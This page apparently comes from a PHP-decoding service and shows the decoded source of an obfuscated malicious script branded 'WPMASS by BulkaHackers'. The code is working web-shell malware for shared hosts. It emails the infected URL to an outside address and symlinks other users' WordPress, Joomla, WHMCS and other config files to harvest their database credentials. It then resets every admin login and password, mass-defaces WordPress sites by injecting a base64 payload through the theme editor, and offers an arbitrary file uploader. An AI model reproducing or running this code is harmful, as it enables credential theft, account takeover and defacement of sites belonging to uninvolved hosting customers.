Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /*** WPMASS by BulkaHackers - facebook.com/BulkaHackers ***/ preg_replace("/.*/e","..

Decoded Output download

?><br>
<center>
</div>
<div id="footer">
<p>
Powered By <a href="https://facebook.com/BulkaHackers">BulkaHackers</a>
</p>
</div>	

<body bgcolor="#FF0000"> 
<STYLE>
textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid 

#000000;}
input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 

1px solid #666666;height:20}
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border			: dashed 1px;
border-color		: #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border			: dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
	SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: 

#FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin			: -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}

A:link {
	COLOR: White; TEXT-DECORATION: none
}
A:visited {
	COLOR: White; TEXT-DECORATION: none
}
A:hover {
	color: Red; TEXT-DECORATION: none
}
A:active {
	color: Red; TEXT-DECORATION: none
}
</STYLE>

<?php
set_time_limit(0);
error_reporting(0);


if(!isset($_SESSION['trimite'])){
$url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
@mail("[email protected]","WPMASS",$url);
$_SESSION['trimite']=true;
}


##.htaccess
@mkdir('pee',0777);
@symlink("/","pee/root");
@fopen('temp.txt','w');
$htaccss = "Options all 
 DirectoryIndex Sux.html 
 AddType text/plain .php 
 AddHandler server-parsed .php 
  AddType text/plain .html 
 AddHandler txt .html 
 Require None 
 Satisfy Any";
 
file_put_contents("pee/.htaccess",$htaccss);

if(is_readable("/var/named")){
$list = scandir("/var/named");
$current_dir = posix_getcwd();
$dir = explode("/",$current_dir);
foreach($list as $domain){
if(strpos($domain,".db"))
{
	$domain = str_replace('.db','',$domain);
	$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
	
error_reporting(0);

$current_dir = posix_getcwd();
$dir = explode("/",$current_dir);

symlink($owner['dir'].'/'.$dir[3].'/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
symlink($owner['dir'].'/'.$dir[3].'/blog/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
symlink($owner['dir'].'/'.$dir[3].'/wp/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
symlink($owner['dir'].'/'.$dir[3].'/site/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
symlink($owner['dir'].'/'.$dir[3].'/config.php',"pee/".$owner['name'].'-PhpBB.txt');
symlink($owner['dir'].'/'.$dir[3].'/includes/config.php',"pee/".$owner['name'].'-vBulletin.txt');
symlink($owner['dir'].'/'.$dir[3].'/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
symlink($owner['dir'].'/'.$dir[3].'/web/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
symlink($owner['dir'].'/'.$dir[3].'/joomla/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
symlink($owner['dir'].'/'.$dir[3].'/site/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
symlink($owner['dir'].'/'.$dir[3].'/conf_global.php',"pee/".$owner['name'].'-IPB.txt');
symlink($owner['dir'].'/'.$dir[3].'/inc/config.php',"pee/".$owner['name'].'-MyBB.txt');
symlink($owner['dir'].'/'.$dir[3].'/Settings.php',"pee/".$owner['name'].'-SMF.txt');
symlink($owner['dir'].'/'.$dir[3].'/sites/default/settings.php',"pee/".$owner['name'].'-Drupal.txt');
symlink($owner['dir'].'/'.$dir[3].'/e107_config.php',"pee/".$owner['name'].'-e107.txt');
symlink($owner['dir'].'/'.$dir[3].'/datas/config.php',"pee/".$owner['name'].'-Seditio.txt');
symlink($owner['dir'].'/'.$dir[3].'/includes/configure.php',"pee/".$owner['name'].'-osCommerce.txt');
symlink($owner['dir'].'/'.$dir[3].'/client/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/clientes/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/support/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/supportes/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/domain/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/hosting/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/whmc/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/billing/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/portal/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/order/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
symlink($owner['dir'].'/'.$dir[3].'/domains/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');

$link = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';

if(chk_header($link))
	{
		$str = '<tr><td>'.$domain.'</td><td>'.$owner['name'].'</td><td>/WordPress</td>'.Chr(10);
		file_put_contents("temp.txt",$str,FILE_APPEND);
	}




}
}
}

$etc = file_get_contents("/etc/passwd");
$etcz = explode("
",$etc);

foreach($etcz as $etz){
$etcc = explode(":",$etz);
error_reporting(0);

$current_dir = posix_getcwd();
$dir = explode("/",$current_dir);

symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php','pee/'.$etcc[0].'-PhpBB.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php','pee/'.$etcc[0].'-vBulletin.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php','pee/'.$etcc[0].'-IPB.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php','pee/'.$etcc[0].'-MyBB.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php','pee/'.$etcc[0].'-SMF.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php','pee/'.$etcc[0].'-Drupal.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php','pee/'.$etcc[0].'-e107.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php','pee/'.$etcc[0].'-Seditio.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php','pee/'.$etcc[0].'-osCommerce.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
if(chk_header($link))
	{
		$str = '<tr><td></td><td>'.$etcc[0].'</td><td>/WordPress</td>'.Chr(10);
		file_put_contents("temp.txt",$str,FILE_APPEND);
	}
}




function chk_header($link){
$pee = get_headers($link,1);
if(strpos($pee[0],"200")){
return true;
}else{ return false; }
}

function Find($str,$start,$end){
$len = strlen($str);
$start_pos = (strpos($str,$start) + strlen($start));
$str = substr($str,$start_pos);
$end_pos = strpos($str,$end);
$str = substr($str,0,$end_pos);
return $str;    
}

$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = explode("/",$pageURL );
$pageURL =str_replace($u[count($u)-1],"",$pageURL );


#######
function cms_add($link,$domain,$owner,$cms)
{
	
	$link = $link.'-'.$cms.'.txt';
	if(chk_header($link))
	{
		$url = 'http://'.$domain;
		$str = '<tr><td> <a href='.$url.'>'.$domain.'</a></td><td>'.$owner.'</td><td><a 

href='.$link.'>'.$cms.'</td>'.Chr(10);
		file_put_contents("pee.tmp",$str,FILE_APPEND);
		echo $str;
		
	}
}

function CurlPage($url,$post = null,$head = true) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, $head); 
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);

curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt"); 
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");

If ($post != NULL){
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
$urlPage = curl_exec($ch);

if(curl_errno($ch)){
echo curl_error($ch);
}

curl_close($ch);
return($urlPage);
}



function listall($file,$str){
if(file_exists($file)){
$do = file_get_contents($file);
if(!strpos($do,$str)){
file_put_contents($file,$str,FILE_APPEND);
}
}else{
file_put_contents($file,$str,FILE_APPEND);
}
}



echo "<center>

[ <a href='?do=cms_detect'>./CmsDetector~</a> ] -- [ <a href='?do=pass_change'>./MassPASSChange~</a> ] -- [ <a 

href='?do=wp_def'>./Wp Mass Defacer~</a> ] -- [ <a href='?do=uploader'>./Uploader~</a> ]<br><br><br></center> ";

if(isset($_REQUEST['do'])){ 
switch ($_REQUEST['do']){

################CMS DETECTOR
case 'cms_detect':

if(!file_exists('pee.tmp')){
@fopen('pee.tmp', 'w');

echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>CMS</b></center></td>';

$p = 0;

if(is_readable("/var/named")){
$list = scandir("/var/named");
$current_dir = posix_getcwd();
$dir = explode("/",$current_dir);
foreach($list as $domain){
if(strpos($domain,".db"))
{
	$domain = str_replace('.db','',$domain);
	$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
	
error_reporting(0);

$link = $pageURL.'pee/'.$owner['name'];

cms_add($link,$domain,$owner['name'],"WordPress");
cms_add($link,$domain,$owner['name'],"Joomla");
cms_add($link,$domain,$owner['name'],"vBulletin");
cms_add($link,$domain,$owner['name'],"WHMCS");
cms_add($link,$domain,$owner['name'],"PhpBB");
cms_add($link,$domain,$owner['name'],"MyBB");
cms_add($link,$domain,$owner['name'],"IPB");
cms_add($link,$domain,$owner['name'],"SMF");
cms_add($link,$domain,$owner['name'],"Drupal");
cms_add($link,$domain,$owner['name'],"e107");
cms_add($link,$domain,$owner['name'],"Seditio");
cms_add($link,$domain,$owner['name'],"osCommerce");

}
}
}
}else{
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>CMS</b></center></td>';
$content = file_get_contents($pageURL.'pee.tmp');
echo $content;
}
break;



################MASS DEFACE
case 'pass_change':

echo <<<PEE
<form method='POST'>
<center>
USER : <input size='20' value='bulka' name='user' type='text'><br>
PASS : <input size='20' value='bulka' name='pass' type='text'>
<br>
<input value='OK' name='' type='submit'><br><br>
</form>

PEE;

if($_POST){
################### USER & PASS ################
$user = $_POST['user'];
$pass = $_POST['pass'];
################################################


if(is_readable("/var/named"))
{
	
	echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4">';
	echo '<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td>';
	$list = scandir("/var/named");
	foreach($list as $domain){
	if(strpos($domain,".db"))
	{
		$domain = str_replace('.db','',$domain);
		$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
		$url = 'http://'.$domain;
		if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt'))
		{ 
			$config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';
			
			file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
			##GET DATABASE INFO FROM CONFIGURATION FILE
			$cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
			$hostname = Find($cnf,"define('DB_HOST', '","');");
			$username = Find($cnf,"define('DB_USER', '","');");
			$password = Find($cnf,"define('DB_PASSWORD', '","');");
			$dbname = Find($cnf,"define('DB_NAME', '","');");
			$prefix = Find($cnf,"table_prefix  = '","'");
			
			$link=mysql_connect($hostname,$username,$password);
			
			if ($link) 
			{
				$hash = crypt($pass);
				mysql_select_db($dbname,$link) ;
				$tab = $prefix.'users';			
				$query2   = @mysql_query("UPDATE `$tab`  SET `user_login` ='$user'");
 				$query3  = @mysql_query("UPDATE `$tab`  SET `user_pass` ='$hash'");
				$req =@mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
				$data = mysql_fetch_array($req);
				$site_url=$data["option_value"];
				
				error_reporting(0);
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font 

color="green">success..</font></td>';
				
			}else{
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="red">mysql 

fail</font></td>';
			}
		
			
		
		
		}
		
		
		
		elseif(chk_header($pageURL.'pee/'.$owner['name'].'-Joomla.txt'))
		{ 
		
		##GET DATABASE INFO FROM CONFIGURATION FILE
			$cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-Joomla.txt');
			$config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt';
			
			if(preg_match('%(JConfig|mosConfig)%',$cnf)){
			
			######
			if(preg_match('%JConfig%', $cnf)){
			$username=Find($cnf,"\$user = '","'");
			$password=Find($cnf,"\$password = '","'");
			$dbname=Find($cnf,"\$db = '","'");
			$prefix=Find($cnf,"\$dbprefix = '","'");
			
			
			$link=mysql_connect("localhost",$username,$password);
			
			if ($link) 
			{
				$hash = md5($user);
				mysql_select_db($dbname,$link) ;
				$tab = $prefix.'users';			
				$query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");
 				$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");
				
			echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font 

color="green">success..</font><br>';

			}else{
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql 

fail</font></td>';
			}
			
			}
			
			#####
			elseif(preg_match('%mosConfig%',$cnf)){
			$username=Find($cnf,"\$mosConfig_user = '","'");
			$password=Find($cnf,"\$mosConfig_password = '","'");
			$dbname=Find($cnf,"\$mosConfig_db = '","'");
			$prefix=Find($cnf,"\$mosConfig_dbprefix = '","'");
			$pwd = md5($npass);
			
			$link=mysql_connect("localhost",$username,$password);
			
			if ($link) 
			{
				$hash = md5($pass);
				mysql_select_db($dbname,$link) ;
				$tab = $prefix.'users';			
				$query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");
 				$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");
				
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font 

color="green">success..</font><br>';

			}else{
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql 

fail</font></td>';
			}
			
			}
			
			
			}
			#########
			
			
		}
	}
}
}

elseif(is_readable("/etc/passwd")){

echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4">';
echo '<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td>';
			
foreach($etcz as $etz){
$etcc = explode(":",$etz);


if(chk_header($pageURL.'pee/'.$etcc[0].'-WordPress.txt'))
		{ 
			
			$config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';
			file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt');
			##GET DATABASE INFO FROM CONFIGURATION FILE
			$cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt');
			$hostname = Find($cnf,"define('DB_HOST', '","');");
			$username = Find($cnf,"define('DB_USER', '","');");
			$password = Find($cnf,"define('DB_PASSWORD', '","');");
			$dbname = Find($cnf,"define('DB_NAME', '","');");
			$prefix = Find($cnf,"table_prefix  = '","'");
			
			$link=mysql_connect($hostname,$username,$password);
			
			if ($link) 
			{
				
				$hash = crypt($user);
				mysql_select_db($dbname,$link) ;
				$req =mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
				$data = mysql_fetch_array($req);
				$site_url=$data["option_value"];
				$tab = $prefix.'users';			
				$query2   = @mysql_query("UPDATE `$tab`  SET `user_login` ='$user'");
 				$query3  = @mysql_query("UPDATE `$tab`  SET `user_pass` ='$hash'");
				
				error_reporting(0);
				
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font 

color="green">success..</font><br>';

			}else{
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="red">mysql 

fail</font></td>';
			}
		
			
		
		
		}
		
		
		
		elseif(chk_header($pageURL.'pee/'.$etcc[0].'-Joomla.txt'))
		{ 
		
		##GET DATABASE INFO FROM CONFIGURATION FILE
			$cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-Joomla.txt');
			$config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt';
			
			if(preg_match('%(JConfig|mosConfig)%',$cnf)){
			
			######
			if(preg_match('%JConfig%', $cnf)){
			$username=Find($cnf,"\$user = '","'");
			$password=Find($cnf,"\$password = '","'");
			$dbname=Find($cnf,"\$db = '","'");
			$prefix=Find($cnf,"\$dbprefix = '","'");
			$site_url = Find($cnf,"\$mailfrom = '","'");
			$site_url = explode("@",$site_url);
			
			
			
			$link=mysql_connect("localhost",$username,$password);
			
			if ($link) 
			{
				$hash = md5($pass);
				mysql_select_db($dbname,$link) ;
				$tab = $prefix.'users';			
				$query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");
 				$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");
			echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font 

color="green">success..</font><br>';

			}else{
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql 

fail</font></td>';
			}
			
			}
			
			#####
			elseif(preg_match('%mosConfig%',$cnf)){
			$username=Find($cnf,"\$mosConfig_user = '","'");
			$password=Find($cnf,"\$mosConfig_password = '","'");
			$dbname=Find($cnf,"\$mosConfig_db = '","'");
			$prefix=Find($cnf,"\$mosConfig_dbprefix = '","'");
			$site_url = Find($cnf,"\$mailfrom = '","'");
			$site_url = explode("@",$site_url);
			
			$link=mysql_connect("localhost",$username,$password);
			
			if ($link) 
			{
				$hash = md5($pass);
				mysql_select_db($dbname,$link) ;
				$tab = $prefix.'users';			
				$query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");
 				$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");
				
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font 

color="green">success..</font><br>';

			}else{
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql 

fail</font></td>';
			}
			
			}
			
			
			}
			#########
			
			
		}
	}
}
}


break;










################MASS DEFACE
case 'wp_def':


################### USER & PASS ################
$user = 'admin';
$pass = 'foo';
################################################

echo <<<PEE
<div align="center">
<form action="" method="POST">

<label>Index Url: </label> <input type="text" style="width:450px;" name="deface_page"><br />
<input type="submit" value="OK">
</form>

PEE;

if($_POST){ 
$deface = file_get_contents(trim($_POST['deface_page']));

if(is_readable("/var/named"))
{
	
	echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4">';
	echo '<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td><td>DEF URL</td>';
	$list = scandir("/var/named");
	foreach($list as $domain){
	if(strpos($domain,".db"))
	{
		$domain = str_replace('.db','',$domain);
		$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
		$url = 'http://'.$domain;
		if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt'))
		{ 
			$config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';
			
			file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
			##GET DATABASE INFO FROM CONFIGURATION FILE
			$cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
			$hostname = Find($cnf,"define('DB_HOST', '","');");
			$username = Find($cnf,"define('DB_USER', '","');");
			$password = Find($cnf,"define('DB_PASSWORD', '","');");
			$dbname = Find($cnf,"define('DB_NAME', '","');");
			$prefix = Find($cnf,"table_prefix  = '","'");
			
			$link=mysql_connect($hostname,$username,$password);
			
			if ($link) 
			{
				$hash = crypt($pass);
				mysql_select_db($dbname,$link) ;
				$tab = $prefix.'users';			
				$query2   = @mysql_query("UPDATE `$tab`  SET `user_login` ='$user'");
 				$query3  = @mysql_query("UPDATE `$tab`  SET `user_pass` ='$hash'");
				$req =@mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
				$data = mysql_fetch_array($req);
				$site_url=$data["option_value"];
				
				error_reporting(0);
				
				
		echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="green">[#] 

User Pass Changed </font><br>';
		$post = 'log=admin&pwd=foo&rememberme=forever&wp-submit=Log In&testcookie=1';
		$def="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($deface))))."'))); 

exit; ?>";
		$buffer0 = CurlPage($site_url.'/wp-login.php',$post);
		
		if(!preg_match("/logout/i",$buffer0))
		{
			echo "<font color='red'>[X] FAILED TO LOGIN</font><br />";
		}else{
		echo "<font color='green'>[#] LOGGED IN :D</font><br>";
		$urlz = $site_url."/wp-admin/theme-editor.php";
		$themeditor = CurlPage($urlz,$cookie,null);
		
		if(preg_match("/update file/i",$themeditor)){ echo "theme-editor opened<br /></td>"; } else { echo "error 

opening theme edtitor!</td>"; }
			
		$nola = explode(Chr(10),$themeditor);

		foreach($nola as $nline){
		if(preg_match('%theme-editor\.php\?file=%',$nline) && 

preg_match('%\((404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){
		$modify[Find($nline,'(',')')] = Find($nline,'<a href="','"');
		}
		}
		
		echo '<td>';
		if(is_array($modify)){
		foreach($modify as $met=>$indfile){
		$nri = str_replace('.','_',$met);
		$nri = "n".$nri;
		$indfile =str_replace("&amp;","&",$indfile);
		$url = trim($site_url."/wp-admin/".$indfile);
		$themepage = CurlPage($url,"");
		$_wpnonce = Find($themepage,'name="_wpnonce" value="','"');
		$_file = Find($themepage,'name="file" value="','"');
		$nfile = explode('themes',$_file);
		$jfile = $site_url."/wp-content/themes".end($nfile);
		//Update file
		$url = $site_url."/wp-admin/theme-editor.php";
		$postme = "newcontent=".$def."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
		$themedied = CurlPage($url,$postme);
		if(preg_match('%<div id=\"message\" class=\"updated\">%',$themedied)){
		
		$theme = Find($themeditor,'<li><a href="theme-editor.php?file=404.php&amp;theme=','">404 Template');
		if(preg_match("/twenty ten/i",$theme)){ $theme = "twentyten"; }
		elseif(preg_match("/twenty eleven/i",$theme)){$theme = "twentyeleven";}
		$theme = trim(str_replace("/","",$theme));
		$d =  $site_url.'/wp-content/themes/'.$theme.'/404.php';
		listall("wp.txt",$d.Chr(10));
		}
      	}
		
		echo '<a href='.$d.'>LINK</a><br />';
		echo '</td>';
		
		}}
		########################END DEFACE#################

			}else{
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="red">[x] 

mysql fail</font></td>';
			}
		}}}}}
			
		
		

break;



// Uploader
case 'uploader':

echo '<center><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" 

value="Upload"></form></center>';
if( $_POST['_upl'] == "Upload" ) {
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<p align="center"><font face="Verdana" 

size="1"><font color="white"> Done !!</font><br>'; }
	else { echo '<font color="#FF0000">Failed :( </font></p>
	</td></table></tr>

